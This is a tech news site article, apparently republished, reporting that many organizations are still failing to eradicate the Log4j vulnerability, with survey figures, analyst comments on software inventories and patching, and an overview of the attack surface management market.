• Tech News
    • Games
    • Pc & Laptop
    • Mobile Tech
    • Ar & Vr
    • Security
  • Startup
    • Fintech
  • Reviews
  • How To
What's Hot

Elementor #32036

January 24, 2025

The Redmi Note 13 is a bigger downgrade compared to the 5G model than you might think

April 18, 2024

Xiaomi Redmi Watch 4 is a budget smartwatch with a premium look and feel

April 16, 2024
Facebook Twitter Instagram
  • Contact
  • Privacy Policy
  • Terms & Conditions
Facebook Twitter Instagram Pinterest VKontakte
Behind The ScreenBehind The Screen
  • Tech News
    1. Games
    2. Pc & Laptop
    3. Mobile Tech
    4. Ar & Vr
    5. Security
    6. View All

    Bring Elden Ring to the table with the upcoming board game adaptation

    September 19, 2022

    ONI: Road to be the Mightiest Oni reveals its opening movie

    September 19, 2022

    GTA 6 images and footage allegedly leak

    September 19, 2022

    Wild west adventure Card Cowboy turns cards into weird and silly stories

    September 18, 2022

    7 Reasons Why You Should Study PHP Programming Language

    October 19, 2022

    Logitech MX Master 3S and MX Keys Combo for Business Gen 2 Review

    October 9, 2022

    Lenovo ThinkPad X1 Carbon Gen10 Review

    September 18, 2022

    Lenovo IdeaPad 5i Chromebook, 16-inch+120Hz

    September 3, 2022

    It’s 2023 and Spotify Still Can’t Say When AirPlay 2 Support Will Arrive

    April 4, 2023

    YouTube adds very convenient iPhone homescreen widgets

    October 15, 2022

    Google finishes iOS 16 Lock Screen widgets rollout w/ Maps

    October 14, 2022

    Is Apple actually turning iMessage into AIM or is this sketchy redesign rumor for laughs?

    October 14, 2022

    MeetKai launches AI-powered metaverse, starting with a billboard in Times Square

    August 10, 2022

    The DeanBeat: RP1 simulates putting 4,000 people together in a single metaverse plaza

    August 10, 2022

    Improving the customer experience with virtual and augmented reality

    August 10, 2022

    Why the metaverse won’t fall to Clubhouse’s fate

    August 10, 2022

    How Apple privacy changes have forced social media marketing to evolve

    October 16, 2022

    Microsoft Patch Tuesday October Fixed 85 Vulnerabilities – Latest Hacking News

    October 16, 2022

    Decentralization and KYC compliance: Critical concepts in sovereign policy

    October 15, 2022

    What Thoma Bravo’s latest acquisition reveals about identity management

    October 14, 2022

    What is a Service Robot? The vision of an intelligent service application is possible.

    November 7, 2022

    Tom Brady just chucked another Microsoft Surface tablet

    September 18, 2022

    The best AIO coolers for your PC in 2022

    September 18, 2022

    YC’s Michael Seibel clarifies some misconceptions about the accelerator • DailyTech

    September 18, 2022
  • Startup
    • Fintech
  • Reviews
  • How To
Behind The ScreenBehind The Screen
Home»Security»Many orgs are still failing to address Log4j — here’s why 
Security

Many orgs are still failing to address Log4j — here’s why 

August 9, 2022No Comments5 Mins Read
Facebook Twitter Pinterest LinkedIn Tumblr Email
Many orgs are still failing to address Log4j — here’s why 
Share
Facebook Twitter LinkedIn Pinterest Email

Were you unable to attend Transform 2022? Check out all of the summit sessions in our on-demand library now! Watch here.


Out of all the vulnerabilities discovered over the past few years, there’s one that stands out from among the cloud: Log4j. When the vulnerability was first identified in December 2021 after researchers identified a remote code execution exploit in the Apache Log4j Library, it became clear that billions of devices that used Java were at risk. 

While much of the uproar over Log4j has died down, many organizations are still struggling to eradicate the vulnerability completely. 

New research released by attack surface management provider, Cycognito, found that 70% of firms that previously addressed Log4j in their attack surface are still struggling to patch Log4j vulnerable assets and prevent new instances of Log4j from resurfacing within their IT stack. 

In fact, some firms are actually seeing their exposure to Log4j increase. Twenty-one percent of org’s with vulnerable assets reported experiencing a triple-digital percentage growth in the number of exposed Log4j vulnerable assets in July compared to January. 

Above all, the findings indicate that the Log4j debacle is far from over, and will continue to haunt organizations that aren’t prepared to proactively manage their attack surface and patch exposed systems. 

Is Log4j still a threat? 

Around a month ago, the U.S. Cyber Safety Review Board’s report renewed interest in Log4j and attempted to dissect the true long-term impact of the vulnerability.  

One of the key findings of the report was that Log4j is an “endemic vulnerability” that “remains deeply embedded in systems.”

See also  T-Cellular agrees to $350 million settlement over its huge 2021 information breach

The authors suggested that one of the key problems is that security teams are often unable to identify where vulnerable software lives within the environment. 

For senior security operations analyst at Forrester, Allie Mellen, the issues around mitigating Log4j come down to companies lacking a comprehensive software inventory.

“Without an accurate inventory of where the function is used, it can be very challenging to track down every single application it is used in the enterprise,” Mellen said. 

Once an organization has a software inventory, it can start to work toward patching vulnerable systems. With Log4j classified as a CVSS 10 vulnerability, it should be a top priority for security teams.  

“CISOs should work with application security teams, risk management teams, and cross-functionality with IT and development teams to prioritize patching Log4j,” she said. “There are a lot of competing priorities for these teams, but Log4j needs to be at the top of the list given the effects it is having on the ecosystem.”

While there are limited public examples of breaches taking place as a result of Log4j, there are some examples of significant damage being caused. Criminals have used the vulnerability to hack Vietnamese crypto trading platform ONUS, demanding a ransom of $5 million and leaking the data of almost 2 million customers online. 

In any case, Log4j provides attackers with an entry point they can use to exploit web applications and gain access to high-value personally identifiable information (PII) and other details. 

Rethinking attack surface management 

The key to identifying and patching Log4j vulnerable systems lies in leveraging a scalable approach to attack surface management, with the ability to discover exposures at scale and at the pace new apps and services are added by users to the environment. 

See also  Here's how VCs are advising founders and assessing startups amid the tech downturn – Startup

This is a task that legacy approaches to vulnerability management with limited automation are ill-equipped to address.

“Log4j is one of the worst [vulnerabilities] of the last few years, if not the last decade. Organizations are struggling to eradicate it, even when they have huge teams. Why? Because of the legacy input-based, unscalable approach,” said Rob Gurzeev, CEO of Cycognito. “That unscalable approach is a legacy mindset when it comes to external attack surface management, where scanning tools don’t scan often or deep enough into assets. Simply put, external attack surfaces are too vast and amorphous for status quo EASM [external attack surface management] solutions.”  

Gurzeev noted that the external attack surface is morphing constantly as organizations deploy new software-as-a-service (SaaS) applications, with Log4j not only impacting old systems but newly deployed ones as well. 

The attack surface management market 

One of the solution categories emerging to address vulnerability management of external-facing assets is attack surface management. 

Providers like Cycognito are working to address the challenges around attack surface management with solutions that can automatically scan the attack surface to provide security teams with more transparency over systems with vulnerabilities.

These solutions then provide security teams with threat intelligence they can use to identify the most vulnerable and at-risk assets. 

As more and more organizations seek scalable vulnerability management solutions, Frost & Sullivan, estimates that the global vulnerability management market will achieve a valuation of $2.51 billion by 2025. 

Over the past 12 months alone, security providers including Cycognito ($100 million) JupiterOne ($70 million), Bishop Fox ($75 million) Cyberpion ($27 million), and Censys ($35 million) all closed significant funding rounds in attack surface management.

See also  Gamescom Opening Night Live 2022 promises 30+ games, here's the start time and where to watch

Other competitors in the market include Microsoft Defender External Attack Surface Management and Mandiant Advantage Attack Surface Management, which aim to help enhance a security team’s ability to identify vulnerabilities and misconfigurations that put enterprise data at risk.  

Source link

address failing Heres Log4j orgs
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email

Related Posts

Should you buy the Nothing Phone (2) or save money and just get the Phone (2a)? Here’s our verdict

April 15, 2024

Sex Workers Took Refuge in Crypto. Now It’s Failing Them | Startup

August 8, 2023

Looking For Hourly Employees? Here’s How To Find Good Ones!

June 25, 2023

Here’s how VCs are advising founders and assessing startups amid the tech downturn – Startup

February 3, 2023
Add A Comment

Comments are closed.

Editors Picks

UK might see nearly 15,000 tech jobs created this yr

July 23, 2022

Are You A Minority Small Business Owner? A New Fund Could Help

August 15, 2023

A Simple Guide To Doing A Technical Audit For Your Website

September 25, 2022

Deliver Us Mars gets new trailer showcasing its astronaut adventure story

August 26, 2022

Subscribe to Updates

Get the latest news and Updates from Behind The Scene about Tech, Startup and more.

Top Post

Elementor #32036

The Redmi Note 13 is a bigger downgrade compared to the 5G model than you might think

Xiaomi Redmi Watch 4 is a budget smartwatch with a premium look and feel

Behind The Screen
Facebook Twitter Instagram Pinterest Vimeo YouTube
  • Contact
  • Privacy Policy
  • Terms & Conditions
© 2025 behindthescreen.uk - All rights reserved.

Type above and press Enter to search. Press Esc to cancel.